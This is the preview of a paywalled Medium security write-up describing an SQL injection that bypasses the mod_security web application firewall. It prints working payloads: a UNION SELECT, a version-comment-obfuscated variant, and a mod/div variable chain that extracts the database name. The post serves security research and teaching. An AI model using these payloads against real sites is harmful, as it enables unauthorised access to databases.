InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties…

Follow publication

Member-only story

Fun sql injection — mod_security bypass

In this writing I would like to show you a somewhat peculiar case with which I came across testing a website.

This is an sql injection where I could bypass the “mod_security” waf.
When I start the sql injection test I realize that the website is using that waf.

We get the error when using a simple:

site/ejemplo?parameter=-1+union+selec+1,2,3,4,5,6,7+--+

Now, I’m not going to lie to you, just by encoding the payload with comments, I was able to bypass the waf filter.

site/ejemplo?parameter=-1+/*!50000union*/+/*!50000selec*/+1,2,3,4,5,6,7+--+

We can see that one of the vulnerable columns is number four.

But like all a lover of sql injections I decided not to leave it like that and try other methods, other payloads .. After many tests and failed mixed payloads.

I ended up trying this:

AND mod(29,9)+div+@a:=(concat(database(),"--","_Y000!_"))+UNION+DISTINCTROW+SELECT+1,2,3,@a,5,6,7

Now what is this all about?

we have:

"AND" = The AND operator returns a record if all conditions separated by AND are TRUE."mod(29,9)" = The mod function is to make a…

Create an account to read the full story.

The author made this story available to Medium members only.
If you’re new to Medium, create a new account to read this story on us.

Or, continue in mobile web

Already have an account? Sign in

Published in InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Written by _Y000_

Hola, Bienvenido a mi perfil de Medium! Soy Y000! 😊 ¿Quién soy? 🤔 Bueno… soy yo jaja soy solo un apasionado por la seguridad informatica.

Responses (1)

Write a response

Thank you for sharing this! I'v just check Wallarm, we are good with the same payloads.

--